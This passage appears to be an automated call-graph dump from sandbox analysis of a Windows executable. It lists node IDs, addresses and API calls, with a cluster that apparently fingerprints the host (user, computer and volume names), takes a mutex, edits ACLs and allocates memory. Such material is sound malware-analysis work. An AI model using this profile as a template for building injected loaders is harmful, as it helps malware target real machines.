109857 404c0c LoadLibraryA 109855->109857 109856->109809 109856->109810 109857->109856 109858 404c1d GetProcAddress 109857->109858 109858->109856 109862 42527c __wfsopen 109859->109862 109860 42528f 109908 428b28 58 API calls __getptd_noexit 109860->109908 109862->109860 109864 4252c0 109862->109864 109863 425294 109909 428db6 9 API calls __wfsopen 109863->109909 109878 4304e8 109864->109878 109867 4252c5 109868 4252db 109867->109868 109869 4252ce 109867->109869 109870 425305 109868->109870 109871 4252e5 109868->109871 109910 428b28 58 API calls __getptd_noexit 109869->109910 109893 430607 109870->109893 109911 428b28 58 API calls __getptd_noexit 109871->109911 109877 42529f __wfsopen @_EH4_CallFilterFunc@8 109877->109815 109879 4304f4 __wfsopen 109878->109879 109880 429c0b __lock 58 API calls 109879->109880 109887 430502 109880->109887 109881 430576 109913 4305fe 109881->109913 109882 43057d 109918 42881d 58 API calls 2 library calls 109882->109918 109885 430584 109885->109881 109919 429e2b InitializeCriticalSectionAndSpinCount 109885->109919 109886 4305f3 __wfsopen 109886->109867 109887->109881 109887->109882 109889 429c93 __mtinitlocknum 58 API calls 109887->109889 109916 426c50 59 API calls __lock 109887->109916 109917 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109887->109917 109889->109887 109891 4305aa EnterCriticalSection 109891->109881 109894 430627 __wopenfile 109893->109894 109895 430641 109894->109895 109907 4307fc 109894->109907 109926 4237cb 60 API calls 2 library calls 109894->109926 109924 428b28 58 API calls __getptd_noexit 109895->109924 109897 430646 109925 428db6 9 API calls __wfsopen 109897->109925 109899 425310 109912 425332 LeaveCriticalSection LeaveCriticalSection _fseek 109899->109912 109900 43085f 109921 4385a1 109900->109921 109903 4307f5 109903->109907 109927 4237cb 60 API calls 2 library calls 109903->109927 109905 430814 109905->109907 109928 4237cb 60 API calls 2 library calls 109905->109928 109907->109895 109907->109900 109908->109863 109909->109877 109910->109877 109911->109877 109912->109877 109920 429d75 LeaveCriticalSection 109913->109920 109915 430605 109915->109886 109916->109887 109917->109887 109918->109885 109919->109891 109920->109915 109929 437d85 109921->109929 109923 4385ba 109923->109899 109924->109897 109925->109899 109926->109903 109927->109905 109928->109907 109931 437d91 __wfsopen 109929->109931 109930 437da7 109932 428b28 __wfsopen 58 API calls 109930->109932 109931->109930 109934 437ddd 109931->109934 109933 437dac 109932->109933 109935 428db6 __wfsopen 9 API calls 109933->109935 109936 437e4e __wsopen_nolock 109 API calls 109934->109936 109939 437db6 __wfsopen 109935->109939 109937 437df9 109936->109937 109938 437e22 __wsopen_helper LeaveCriticalSection 109937->109938 109938->109939 109939->109923 109941 404b83 109940->109941 109942 404c3f LoadLibraryA 109940->109942 109941->109819 109941->109820 109942->109941 109943 404c50 GetProcAddress 109942->109943 109943->109941 109945 420db6 Mailbox 59 API calls 109944->109945 109946 405240 109945->109946 109946->109827 109948 404ea3 FindResourceExW 109947->109948 109952 404ec0 109947->109952 109949 43d933 LoadResource 109948->109949 109948->109952 109950 43d948 SizeofResource 109949->109950 109949->109952 109951 43d95c LockResource 109950->109951 109950->109952 109951->109952 109952->109833 109954 404ef4 109953->109954 109955 43d9ab 109953->109955 109959 42584d 109954->109959 109957 404f02 109957->109839 109958->109833 109960 425859 __wfsopen 109959->109960 109961 42586b 109960->109961 109963 425891 109960->109963 109972 428b28 58 API calls __getptd_noexit 109961->109972 109965 426c11 __lock_file 59 API calls 109963->109965 109964 425870 109973 428db6 9 API calls __wfsopen 109964->109973 109967 425897 109965->109967 109974 4257be 83 API calls 5 library calls 109967->109974 109969 4258a6 109975 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 109969->109975 109971 42587b __wfsopen 109971->109957 109972->109964 109973->109971 109974->109969 109975->109971 109979 4255fd 109976->109979 109978 404f2e 109978->109847 109981 425609 __wfsopen 109979->109981 109980 425644 __wfsopen 109980->109978 109981->109980 109982 42561f _memset 109981->109982 109983 42564c 109981->109983 109992 428b28 58 API calls __getptd_noexit 109982->109992 109984 426c11 __lock_file 59 API calls 109983->109984 109986 425652 109984->109986 109994 42541d 72 API calls 6 library calls 109986->109994 109987 425639 109993 428db6 9 API calls __wfsopen 109987->109993 109990 425668 109995 425686 LeaveCriticalSection LeaveCriticalSection _fseek 109990->109995 109992->109987 109993->109980 109994->109990 109995->109980 109999 42520a GetSystemTimeAsFileTime 109996->109999 109998 468f6e 109998->109849 110000 425238 __aulldiv 109999->110000 110000->109998 110002 425c6c __wfsopen 110001->110002 110003 425c93 110002->110003 110004 425c7e 110002->110004 110005 426c11 __lock_file 59 API calls 110003->110005 110015 428b28 58 API calls __getptd_noexit 110004->110015 110007 425c99 110005->110007 110017 4258d0 67 API calls 6 library calls 110007->110017 110008 425c83 110016 428db6 9 API calls __wfsopen 110008->110016 110011 425ca4 110018 425cc4 LeaveCriticalSection LeaveCriticalSection _fseek 110011->110018 110013 425cb6 110014 425c8e __wfsopen 110013->110014 110014->109854 110015->110008 110016->110014 110017->110011 110018->110013 110020 4078b7 110019->110020 110021 40785a 110019->110021 110022 407d2c 59 API calls 110020->110022 110021->110020 110023 407865 110021->110023 110028 407888 _memmove 110022->110028 110024 407880 110023->110024 110025 43eb09 110023->110025 110041 407f27 110024->110041 110027 408029 59 API calls 110025->110027 110029 43eb13 110027->110029 110028->109635 110030 420db6 Mailbox 59 API calls 110029->110030 110031 43eb33 110030->110031 110033 407d3a 110032->110033 110035 407d43 _memmove 110032->110035 110034 407e4f 59 API calls 110033->110034 110033->110035 110034->110035 110035->109629 110037 407da6 110036->110037 110039 407d99 110036->110039 110038 420db6 Mailbox 59 API calls 110037->110038 110038->110039 110039->109630 110040->109658 110042 407f39 110041->110042 110043 407f3f 110041->110043 110042->110028 110044 420db6 Mailbox 59 API calls 110043->110044 110044->110042 110046 407a85 _memmove 110045->110046 110047 407a5f 110045->110047 110046->109671 110047->110046 110048 420db6 Mailbox 59 API calls 110047->110048 110049 407ad4 110048->110049 110050 420db6 Mailbox 59 API calls 110049->110050 110050->110046 110051->109672 110147->109786 110149 407c5f __NMSG_WRITE 110148->110149 110150 407c70 _memmove 110149->110150 110151 408029 59 API calls 110149->110151 110150->109793 110152 43ed07 _memmove 110151->110152 110153->109258 110154->109230 110155->109244 110156->109242 110157->109246 110158->109256 110159->109259 110160->109263 110161->108998 110162->108996 110163->108890 110164->108890 110165->108881 110166->108874 110167->108875 110168->108874 110169->108911 110170 401066 110175 40f76f 110170->110175 110172 40106c 110173 422d40 __cinit 67 API calls 110172->110173 110174 401076 110173->110174 110176 40f790 110175->110176 110208 41ff03 110176->110208 110180 40f7d7 110181 407667 59 API calls 110180->110181 110182 40f7e1 110181->110182 110183 407667 59 API calls 110182->110183 110184 40f7eb 110183->110184 110185 407667 59 API calls 110184->110185 110186 40f7f5 110185->110186 110187 407667 59 API calls 110186->110187 110188 40f833 110187->110188 110189 407667 59 API calls 110188->110189 110190 40f8fe 110189->110190 110218 415f87 110190->110218 110194 40f930 110195 407667 59 API calls 110194->110195 110196 40f93a 110195->110196 110246 41fd9e 110196->110246 110198 40f981 110199 40f991 GetStdHandle 110198->110199 110200 40f9dd 110199->110200 110201 4445ab 110199->110201 110202 40f9e5 OleInitialize 110200->110202 110201->110200 110203 4445b4 110201->110203 110202->110172 110253 466b38 64 API calls Mailbox 110203->110253 110205 4445bb 110254 467207 CreateThread 110205->110254 110207 4445c7 CloseHandle 110207->110202 110255 41ffdc 110208->110255 110211 41ffdc 59 API calls 110212 41ff45 110211->110212 110213 407667 59 API calls 110212->110213 110214 41ff51 110213->110214 110215 407bcc 59 API calls 110214->110215 110216 40f796 110215->110216 110217 420162 6 API calls 110216->110217 110217->110180 110219 407667 59 API calls 110218->110219 110220 415f97 110219->110220 110221 407667 59 API calls 110220->110221 110222 415f9f 110221->110222 110262 415a9d 110222->110262 110225 415a9d 59 API calls 110226 415faf 110225->110226 110227 407667 59 API calls 110226->110227 110228 415fba 110227->110228 110229 420db6 Mailbox 59 API calls 110228->110229 110230 40f908 110229->110230 110231 4160f9 110230->110231 110232 416107 110231->110232 110233 407667 59 API calls 110232->110233 110234 416112 110233->110234 110235 407667 59 API calls 110234->110235 110236 41611d 110235->110236 110237 407667 59 API calls 110236->110237 110238 416128 110237->110238 110239 407667 59 API calls 110238->110239 110240 416133 110239->110240 110241 415a9d 59 API calls 110240->110241 110242 41613e 110241->110242 110243 420db6 Mailbox 59 API calls 110242->110243 110244 416145 RegisterWindowMessageW 110243->110244 110244->110194 110247 45576f 110246->110247 110248 41fdae 110246->110248 110265 469ae7 60 API calls 110247->110265 110250 420db6 Mailbox 59 API calls 110248->110250 110252 41fdb6 110250->110252 110251 45577a 110252->110198 110253->110205 110254->110207 110266 4671ed 65 API calls 110254->110266 110256 407667 59 API calls 110255->110256 110257 41ffe7 110256->110257 110258 407667 59 API calls 110257->110258 110259 41ffef 110258->110259 110260 407667 59 API calls 110259->110260 110261 41ff3b 110260->110261 110261->110211 110263 407667 59 API calls 110262->110263 110264 415aa5 110263->110264 110264->110225 110265->110251 110267 2f15a3b 110268 2f15a45 110267->110268 110273 2f14f7c 110267->110273 110269 2f15a4b CreateThread 110268->110269 110270 2f151ae 110268->110270 110272 2f15a59 RtlExitUserThread 110269->110272 110271 2f14f88 110277 2f15b1d 110272->110277 110273->110271 110280 2f15d20 110273->110280 110276 2f14f99 110278 2f15d20 2 API calls 110277->110278 110279 2f15b3c 110278->110279 110282 2f15d22 110280->110282 110281 2f15d39 VirtualAlloc 110281->110282 110282->110276 110282->110281 110284 2f15d46 VirtualFree 110282->110284 110284->110276 110285 44416f 110289 455fe6 110285->110289 110287 44417a 110288 455fe6 85 API calls 110287->110288 110288->110287 110290 456020 110289->110290 110294 455ff3 110289->110294 110290->110287 110291 456022 110301 409328 84 API calls Mailbox 110291->110301 110292 456027 110295 409837 84 API calls 110292->110295 110294->110290 110294->110291 110294->110292 110298 45601a 110294->110298 110296 45602e 110295->110296 110297 407b2e 59 API calls 110296->110297 110297->110290 110300 4095a0 59 API calls _wcsstr 110298->110300 110300->110290 110301->110292 110302 40e5ab 110305 40d100 110302->110305 110304 40e5b9 110306 40d37d 110305->110306 110307 40d11d 110305->110307 110320 40d54b 110306->110320 110354 469e4a 89 API calls 4 library calls 110306->110354 110308 4426e0 110307->110308 110309 442691 110307->110309 110337 40d144 110307->110337 110349 47a3e6 331 API calls __cinit 110308->110349 110311 442694 110309->110311 110316 4426af 110309->110316 110313 4426a0 110311->110313 110311->110337 110347 47a9fa 331 API calls 110313->110347 110316->110306 110348 47aea2 331 API calls 3 library calls 110316->110348 110317 422d40 __cinit 67 API calls 110317->110337 110318 40d434 110341 408a52 68 API calls 110318->110341 110319 4428b5 110319->110319 110320->110304 110324 4427fc 110353 47a751 89 API calls 110324->110353 110325 40d443 110325->110304 110328 4084c0 69 API calls 110328->110337 110335 409ea0 331 API calls 110335->110337 110336 408047 59 API calls 110336->110337 110337->110306 110337->110317 110337->110318 110337->110320 110337->110324 110337->110328 110337->110335 110337->110336 110339 408740 68 API calls __cinit 110337->110339 110340 408542 68 API calls 110337->110340 110342 40843a 68 API calls 110337->110342 110343 40cf7c 331 API calls 110337->110343 110344 409dda 59 API calls Mailbox 110337->110344 110345 40cf00 89 API calls 110337->110345 110346 40cd7d 331 API calls 110337->110346 110350 408a52 68 API calls 110337->110350 110351 409d3c 60 API calls Mailbox 110337->110351 110352 45678d 60 API calls 110337->110352 110339->110337 110340->110337 110341->110325 110342->110337 110343->110337 110344->110337 110345->110337 110346->110337 110347->110320 110348->110306 110349->110337 110350->110337 110351->110337 110352->110337 110353->110306 110354->110319 110355 a8a6f8 110369 a88348 110355->110369 110357 a8a7d4 110372 a8a5e8 110357->110372 110375 a8b7f8 GetPEB 110369->110375 110371 a889d3 110371->110357 110373 a8a5f1 Sleep 110372->110373 110374 a8a5ff 110373->110374 110376 a8b822 110375->110376 110376->110371 110377 2f1b180 110386 2f1b0de 110377->110386 110378 2f1b2a7 SetFilePointerEx 110379 2f1b1df 110378->110379 110382 2f1b1c6 110378->110382 110380 2f1b196 110381 2f1b3a6 110380->110381 110380->110382 110383 2f1b3b2 110381->110383 110384 2f1b328 SetFilePointerEx 110381->110384 110382->110379 110385 2f1b2e0 WriteFile 110382->110385 110386->110377 110386->110378 110386->110380 110386->110384 110387 2f1b0d0 SetFilePointerEx 110386->110387 110388 2f1b253 110386->110388 110387->110386 110389 2f1b054 110387->110389 110390 403633 110391 40366a 110390->110391 110392 4036e7 110391->110392 110393 403688 110391->110393 110430 4036e5 110391->110430 110395 4036ed 110392->110395 110396 43d0cc 110392->110396 110397 403695 110393->110397 110398 40374b PostQuitMessage 110393->110398 110394 4036ca DefWindowProcW 110431 4036d8 110394->110431 110399 4036f2 110395->110399 110400 403715 SetTimer RegisterWindowMessageW 110395->110400 110439 411070 10 API calls Mailbox 110396->110439 110402 4036a0 110397->110402 110403 43d154 110397->110403 110398->110431 110404 4036f9 KillTimer 110399->110404 110405 43d06f 110399->110405 110407 40373e CreatePopupMenu 110400->110407 110400->110431 110408 403755 110402->110408 110409 4036a8 110402->110409 110455 462527 71 API calls _memset 110403->110455 110435 40443a Shell_NotifyIconW _memset 110404->110435 110417 43d074 110405->110417 110418 43d0a8 MoveWindow 110405->110418 110406 43d0f3 110440 411093 331 API calls Mailbox 110406->110440 110407->110431 110437 4044a0 64 API calls _memset 110408->110437 110413 4036b3 110409->110413 110414 43d139 110409->110414 110422 4036be 110413->110422 110423 43d124 110413->110423 110414->110394 110454 457c36 59 API calls Mailbox 110414->110454 110415 43d166 110415->110394 110415->110431 110419 43d097 SetFocus 110417->110419 110420 43d078 110417->110420 110418->110431 110419->110431 110420->110422 110425 43d081 110420->110425 110421 40370c 110436 403114 DeleteObject DestroyWindow Mailbox 110421->110436 110422->110394 110441 40443a Shell_NotifyIconW _memset 110422->110441 110453 462d36 81 API calls _memset 110423->110453 110424 403764 110424->110431 110438 411070 10 API calls Mailbox 110425->110438 110430->110394 110433 43d118 110442 40434a 110433->110442 110435->110421 110436->110431 110437->110424 110438->110431 110439->110406 110440->110422 110441->110433 110443 404375 _memset 110442->110443 110456 404182 110443->110456 110447 404430 Shell_NotifyIconW 110450 404422 110447->110450 110448 404414 Shell_NotifyIconW 110448->110450 110449 4043fa 110449->110447 110449->110448 110460 40407c 110450->110460 110452 404429 110452->110430 110453->110424 110454->110430 110455->110415 110457 43d423 110456->110457 110458 404196 110456->110458 110457->110458 110459 43d42c DestroyIcon 110457->110459 110458->110449 110482 462f94 62 API calls _W_store_winword 110458->110482 110459->110458 110461 404098 110460->110461 110462 40416f Mailbox 110460->110462 110463 407a16 59 API calls 110461->110463 110462->110452 110464 4040a6 110463->110464 110465 4040b3 110464->110465 110466 43d3c8 LoadStringW 110464->110466 110467 407bcc 59 API calls 110465->110467 110469 43d3e2 110466->110469 110468 4040c8 110467->110468 110468->110469 110470 4040d9 110468->110470 110471 407b2e 59 API calls 110469->110471 110472 4040e3 110470->110472 110473 404174 110470->110473 110476 43d3ec 110471->110476 110475 407b2e 59 API calls 110472->110475 110474 408047 59 API calls 110473->110474 110479 4040ed _memset _wcscpy 110474->110479 110475->110479 110477 407cab 59 API calls 110476->110477 110476->110479 110478 43d40e 110477->110478 110481 407cab 59 API calls 110478->110481 110480 404155 Shell_NotifyIconW 110479->110480 110480->110462 110481->110479 110482->110449 110483 2f17b22 110484 2f15f10 110483->110484 110485 2f17b2b 110483->110485 110486 2f16084 SetFilePointerEx 110484->110486 110487 2f15d90 110484->110487 110486->110484 110488 427c56 110489 427c62 110488->110489 110525 429e08 GetStartupInfoW 110489->110525 110491 427c67 110527 428b7c GetProcessHeap 110491->110527 110493 427cbf 110494 427cca 110493->110494 110610 427da6 58 API calls 3 library calls 110493->110610 110528 429ae6 110494->110528 110497 427cd0 110498 427cdb __RTC_Initialize 110497->110498 110611 427da6 58 API calls 3 library calls 110497->110611 110549 42d5d2 110498->110549 110501 427cea 110502 427cf6 GetCommandLineW 110501->110502 110612 427da6 58 API calls 3 library calls 110501->110612 110568 434f23 GetEnvironmentStringsW 110502->110568 110505 427cf5 110505->110502 110508 427d10 110509 427d1b 110508->110509 110613 4230b5 58 API calls 3 library calls 110508->110613 110578 434d58 110509->110578 110512 427d21 110513 427d2c 110512->110513 110614 4230b5 58 API calls 3 library calls 110512->110614 110592 4230ef 110513->110592 110516 427d34 110517 427d3f __wwincmdln 110516->110517 110615 4230b5 58 API calls 3 library calls 110516->110615 110598 4047d0 110517->110598 110520 427d53 110521 427d62 110520->110521 110616 423358 58 API calls _doexit 110520->110616 110617 4230e0 58 API calls _doexit 110521->110617 110524 427d67 __wfsopen 110526 429e1e 110525->110526 110526->110491 110527->110493 110618 423187 36 API calls 2 library calls 110528->110618 110530 429aeb 110619 429d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 110530->110619 110532 429af0 110533 429af4 110532->110533 110621 429d8a TlsAlloc 110532->110621 110620 429b5c 61 API calls 2 library calls 110533->110620 110536 429b06 110536->110533 110538 429b11 110536->110538 110537 429af9 110537->110497 110622 4287d5 110538->110622 110541 429b53 110630 429b5c 61 API calls 2 library calls 110541->110630 110544 429b32 110544->110541 110546 429b38 110544->110546 110545 429b58 110545->110497 110629 429a33 58 API calls 4 library calls 110546->110629 110548 429b40 GetCurrentThreadId 110548->110497 110550 42d5de __wfsopen 110549->110550 110551 429c0b __lock 58 API calls 110550->110551 110552 42d5e5 110551->110552 110553 4287d5 __calloc_crt 58 API calls 110552->110553 110554 42d5f6 110553->110554 110555 42d661 GetStartupInfoW 110554->110555 110556 42d601 __wfsopen @_EH4_CallFilterFunc@8 110554->110556 110557 42d7a5 110555->110557 110564 42d676 110555->110564 110556->110501 110558 42d86d 110557->110558 110561 42d7f2 GetStdHandle 110557->110561 110563 42d805 GetFileType 110557->110563 110643 429e2b InitializeCriticalSectionAndSpinCount 110557->110643 110644 42d87d LeaveCriticalSection _doexit 110558->110644 110560 4287d5 __calloc_crt 58 API calls 110560->110564 110561->110557 110562 42d6c4 110562->110557 110565 42d6f8 GetFileType 110562->110565 110642 429e2b InitializeCriticalSectionAndSpinCount 110562->110642 110563->110557 110564->110557 110564->110560 110564->110562 110565->110562 110569 434f34 110568->110569 110570 427d06 110568->110570 110645 42881d 58 API calls 2 library calls 110569->110645 110574 434b1b GetModuleFileNameW 110570->110574 110572 434f70 FreeEnvironmentStringsW 110572->110570 110573 434f5a _memmove 110573->110572 110575 434b4f _wparse_cmdline 110574->110575 110577 434b8f _wparse_cmdline 110575->110577 110646 42881d 58 API calls 2 library calls 110575->110646 110577->110508 110579 434d71 __NMSG_WRITE 110578->110579 110583 434d69 110578->110583 110580 4287d5 __calloc_crt 58 API calls 110579->110580 110588 434d9a __NMSG_WRITE 110580->110588 110581 434df1 110582 422d55 _free 58 API calls 110581->110582 110582->110583 110583->110512 110584 4287d5 __calloc_crt 58 API calls 110584->110588 110585 434e16 110587 422d55 _free 58 API calls 110585->110587 110587->110583 110588->110581 110588->110583 110588->110584 110588->110585 110589 434e2d 110588->110589 110647 434607 58 API calls __wfsopen 110588->110647 110648 428dc6 IsProcessorFeaturePresent 110589->110648 110591 434e39 110591->110512 110593 4230fb __IsNonwritableInCurrentImage 110592->110593 110663 42a4d1 110593->110663 110595 423119 __initterm_e 110596 422d40 __cinit 67 API calls 110595->110596 110597 423138 __cinit __IsNonwritableInCurrentImage 110595->110597 110596->110597 110597->110516 110599 4047ea 110598->110599 110609 404889 110598->110609 110600 404824 IsThemeActive 110599->110600 110666 42336c 110600->110666 110604 404850 110678 4048fd SystemParametersInfoW SystemParametersInfoW 110604->110678 110606 40485c 110679 403b3a 110606->110679 110609->110520 110610->110494 110611->110498 110612->110505 110616->110521 110617->110524 110618->110530 110619->110532 110620->110537 110621->110536 110624 4287dc 110622->110624 110625 428817 110624->110625 110627 4287fa 110624->110627 110631 4351f6 110624->110631 110625->110541 110628 429de6 TlsSetValue 110625->110628 110627->110624 110627->110625 110639 42a132 Sleep 110627->110639 110628->110544 110629->110548 110630->110545 110632 435201 110631->110632 110637 43521c 110631->110637 110633 43520d 110632->110633 110632->110637 110640 428b28 58 API calls __getptd_noexit 110633->110640 110634 43522c HeapAlloc 110636 435212 110634->110636 110634->110637 110636->110624 110637->110634 110637->110636 110641 4233a1 DecodePointer 110637->110641 110639->110627 110640->110636 110641->110637 110642->110562 110643->110557 110644->110556 110645->110573 110646->110577 110647->110588 110649 428dd1 110648->110649 110654 428c59 110649->110654 110653 428dec 110653->110591 110655 428c73 _memset ___raise_securityfailure 110654->110655 110656 428c93 IsDebuggerPresent 110655->110656 110662 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 110656->110662 110658 428d57 ___raise_securityfailure 110659 42c5f6 __woutput_l 6 API calls 110658->110659 110660 428d7a 110659->110660 110661 42a140 GetCurrentProcess TerminateProcess 110660->110661 110661->110653 110662->110658 110664 42a4d4 EncodePointer 110663->110664 110664->110664 110665 42a4ee 110664->110665 110665->110595 110667 429c0b __lock 58 API calls 110666->110667 110668 423377 DecodePointer EncodePointer 110667->110668 110731 429d75 LeaveCriticalSection 110668->110731 110670 404849 110671 4233d4 110670->110671 110672 4233f8 110671->110672 110673 4233de 110671->110673 110672->110604 110673->110672 110732 428b28 58 API calls __getptd_noexit 110673->110732 110675 4233e8 110733 428db6 9 API calls __wfsopen 110675->110733 110677 4233f3 110677->110604 110678->110606 110680 403b47 __ftell_nolock 110679->110680 110681 407667 59 API calls 110680->110681 110682 403b51 GetCurrentDirectoryW 110681->110682 110734 403766 110682->110734 110731->110670 110732->110675 110733->110677 110735 407667 59 API calls 110734->110735 110736 40377c 110735->110736 110865 403d31 110736->110865 110738 40379a 110739 404706 61 API calls 110738->110739 110740 4037ae 110739->110740 110741 407de1 59 API calls 110740->110741 110742 4037bb 110741->110742 110743 404ddd 136 API calls 110742->110743 110744 4037d4 110743->110744 110745 43d173 110744->110745 110746 4037dc Mailbox 110744->110746 110918 46955b 110745->110918 110749 408047 59 API calls 110746->110749 110753 4037ef 110749->110753 110750 43d192 110752 422d55 _free 58 API calls 110750->110752 110751 404e4a 84 API calls 110751->110750 110754 43d19f 110752->110754 110879 40928a 110753->110879 110756 404e4a 84 API calls 110754->110756 110758 43d1a8 110756->110758 110762 403ed0 59 API calls 110758->110762 110759 407de1 59 API calls 110760 403808 110759->110760 110761 4084c0 69 API calls 110760->110761 110763 40381a Mailbox 110761->110763 110764 43d1c3 110762->110764 110765 407de1 59 API calls 110763->110765 110766 403ed0 59 API calls 110764->110766 110767 403840 110765->110767 110769 43d1df 110766->110769 110768 4084c0 69 API calls 110767->110768 110772 40384f Mailbox 110768->110772 110770 404706 61 API calls 110769->110770 110771 43d204 110770->110771 110773 403ed0 59 API calls 110771->110773 110775 407667 59 API calls 110772->110775 110774 43d210 110773->110774 110776 408047 59 API calls 110774->110776 110777 40386d 110775->110777 110778 43d21e 110776->110778 110882 403ed0 110777->110882 110780 403ed0 59 API calls 110778->110780 110782 43d22d 110780->110782 110788 408047 59 API calls 110782->110788 110784 403887 110784->110758 110785 403891 110784->110785 110786 422efd _W_store_winword 60 API calls 110785->110786 110787 40389c 110786->110787 110787->110764 110789 4038a6 110787->110789 110791 43d24f 110788->110791 110790 422efd _W_store_winword 60 API calls 110789->110790 110793 4038b1 110790->110793 110792 403ed0 59 API calls 110791->110792 110794 43d25c 110792->110794 110793->110769 110795 4038bb 110793->110795 110794->110794 110796 422efd _W_store_winword 60 API calls 110795->110796 110797 4038c6 110796->110797 110797->110782 110798 403907 110797->110798 110800 403ed0 59 API calls 110797->110800 110798->110782 110799 403914 110798->110799 110898 4092ce 110799->110898 110801 4038ea 110800->110801 110804 408047 59 API calls 110801->110804 110806 4038f8 110804->110806 110808 403ed0 59 API calls 110806->110808 110808->110798 110812 40394f 110866 403d3e __ftell_nolock 110865->110866 110867 403ea4 Mailbox 110866->110867 110868 407bcc 59 API calls 110866->110868 110867->110738 110869 403d70 110868->110869 110870 4079f2 59 API calls 110869->110870 110878 403da6 Mailbox 110869->110878 110870->110869 110871 4079f2 59 API calls 110871->110878 110872 403e77 110872->110867 110873 407de1 59 API calls 110872->110873 110875 403e98 110873->110875 110874 407de1 59 API calls 110874->110878 110876 403f74 59 API calls 110875->110876 110876->110867 110878->110867 110878->110871 110878->110872 110878->110874 110953 403f74 110878->110953 110880 420db6 Mailbox 59 API calls 110879->110880 110881 4037fb 110880->110881 110881->110759 110883 403ef3 110882->110883 110884 403eda 110882->110884 110885 407bcc 59 API calls 110883->110885 110886 408047 59 API calls 110884->110886 110887 403879 110885->110887 110886->110887 110888 422efd 110887->110888 110889 422f09 110888->110889 110890 422f7e 110888->110890 110897 422f2e 110889->110897 110959 428b28 58 API calls __getptd_noexit 110889->110959 110961 422f90 60 API calls 3 library calls 110890->110961 110892 422f8b 110892->110784 110894 422f15 110960 428db6 9 API calls __wfsopen 110894->110960 110896 422f20 110896->110784 110897->110784 110899 4092d6 110898->110899 110900 420db6 Mailbox 59 API calls 110899->110900 110901 4092e4 110900->110901 110902 403924 110901->110902 110962 4091fc 59 API calls Mailbox 110901->110962 110904 409050 110902->110904 110963 409160 110904->110963 110906 40905f 110907 420db6 Mailbox 59 API calls 110906->110907 110908 403932 110906->110908 110907->110908 110909 408ee0 110908->110909 110910 43f17c 110909->110910 110915 408ef7 110909->110915 110910->110915 110973 408bdb 59 API calls Mailbox 110910->110973 110912 409040 110972 409d3c 60 API calls Mailbox 110912->110972 110913 408ff8 110916 420db6 Mailbox 59 API calls 110913->110916 110915->110912 110915->110913 110917 408fff 110915->110917 110916->110917 110917->110812 110919 404ee5 85 API calls 110918->110919 110920 4695ca 110919->110920 110921 469734 96 API calls 110920->110921 110922 4695dc 110921->110922 110923 404f0b 74 API calls 110922->110923 110949 43d186 110922->110949 110924 4695f7 110923->110924 110925 404f0b 74 API calls 110924->110925 110926 469607 110925->110926 110927 404f0b 74 API calls 110926->110927 110928 469622 110927->110928 110929 404f0b 74 API calls 110928->110929 110930 46963d 110929->110930 110931 404ee5 85 API calls 110930->110931 110932 469654 110931->110932 110933 42571c std::exception::_Copy_str 58 API calls 110932->110933 110934 46965b 110933->110934 110935 42571c std::exception::_Copy_str 58 API calls 110934->110935 110936 469665 110935->110936 110937 404f0b 74 API calls 110936->110937 110938 469679 110937->110938 110939 469109 GetSystemTimeAsFileTime 110938->110939 110940 46968c 110939->110940 110941 4696b6 110940->110941 110942 4696a1 110940->110942 110944 4696bc 110941->110944 110945 46971b 110941->110945 110943 422d55 _free 58 API calls 110942->110943 110947 4696a7 110943->110947 110948 468b06 116 API calls 110944->110948 110946 422d55 _free 58 API calls 110945->110946 110946->110949 110950 422d55 _free 58 API calls 110947->110950 110951 469713 110948->110951 110949->110750 110949->110751 110950->110949 110952 422d55 _free 58 API calls 110951->110952 110952->110949 110954 403f82 110953->110954 110958 403fa4 _memmove 110953->110958 110957 420db6 Mailbox 59 API calls 110954->110957 110955 420db6 Mailbox 59 API calls 110956 403fb8 110955->110956 110956->110878 110957->110958 110958->110955 110959->110894 110960->110896 110961->110892 110962->110902 110964 409169 Mailbox 110963->110964 110965 43f19f 110964->110965 110970 409173 110964->110970 110966 420db6 Mailbox 59 API calls 110965->110966 110968 43f1ab 110966->110968 110967 40917a 110967->110906 110970->110967 110971 409c90 59 API calls Mailbox 110970->110971 110971->110970 110972->110917 110973->110915 111202 2f15085 111203 2f15089 111202->111203 111204 2f1506f 111202->111204 111207 2f38550 111204->111207 111206 2f15078 111228 2f38556 111207->111228 111208 2f3855c 111210 2f38568 111208->111210 111226 2f37dd7 111208->111226 111209 2f38145 GetLastError 111209->111226 111215 2f3896a wsprintfW 111210->111215 111223 2f37d30 111210->111223 111211 2f38986 SetEntriesInAclW 111211->111228 111212 2f383fb GetUserNameW 111212->111226 111213 2f38209 GetUserNameW 111213->111226 111230 2f37d37 111213->111230 111214 2f38bc1 GetLastError 111214->111228 111215->111223 111216 2f389cd OpenMutexW 111216->111206 111217 2f38248 111219 2f3824a GetLastError 111217->111219 111219->111206 111220 2f3836e GetLastError 111220->111226 111221 2f37d6c GetVolumeInformationW 111221->111206 111222 2f37d20 111222->111221 111222->111223 111224 2f37d83 GetWindowsDirectoryW 111222->111224 111229 2f37e06 GetComputerNameW 111222->111229 111222->111230 111223->111221 111223->111230 111224->111223 111224->111230 111225 2f37fd4 GetLastError 111225->111226 111226->111209 111226->111212 111226->111213 111226->111217 111226->111219 111226->111220 111226->111221 111226->111222 111226->111223 111226->111225 111226->111230 111232 2f37f6b GetVolumeInformationW 111226->111232 111227 2f38953 AllocateAndInitializeSid 111227->111228 111228->111207 111228->111208 111228->111209 111228->111210 111228->111211 111228->111214 111228->111215 111228->111216 111228->111222 111228->111223 111228->111226 111228->111227 111228->111230 111231 2f3890b LocalFree 111228->111231 111229->111230 111230->111206 111231->111228 111232->111226 111233 401055 111238 402649 111233->111238 111236 422d40 __cinit 67 API calls 111237 401064 111236->111237 111239 407667 59 API calls 111238->111239 111240 4026b7 111239->111240 111245 403582 111240->111245 111242 402754 111244 40105a 111242->111244 111248 403416 59 API calls 2 library calls 111242->111248 111244->111236 111249 4035b0 111245->111249 111248->111242 111250 4035bd 111249->111250 111251 4035a1 111249->111251 111250->111251 111252 4035c4 RegOpenKeyExW 111250->111252 111251->111242 111252->111251 111253 4035de RegQueryValueExW 111252->111253 111254 403614 RegCloseKey 111253->111254 111255 4035ff 111253->111255 111254->111251 111255->111254 111256 401016 111261 404974 111256->111261 111259 422d40 __cinit 67 API calls 111260 401025 111259->111260 111262 420db6 Mailbox 59 API calls 111261->111262 111263 40497c 111262->111263 111264 40101b 111263->111264 111268 404936 111263->111268 111264->111259 111269 404951 111268->111269 111270 40493f 111268->111270 111272 4049a0 111269->111272 111271 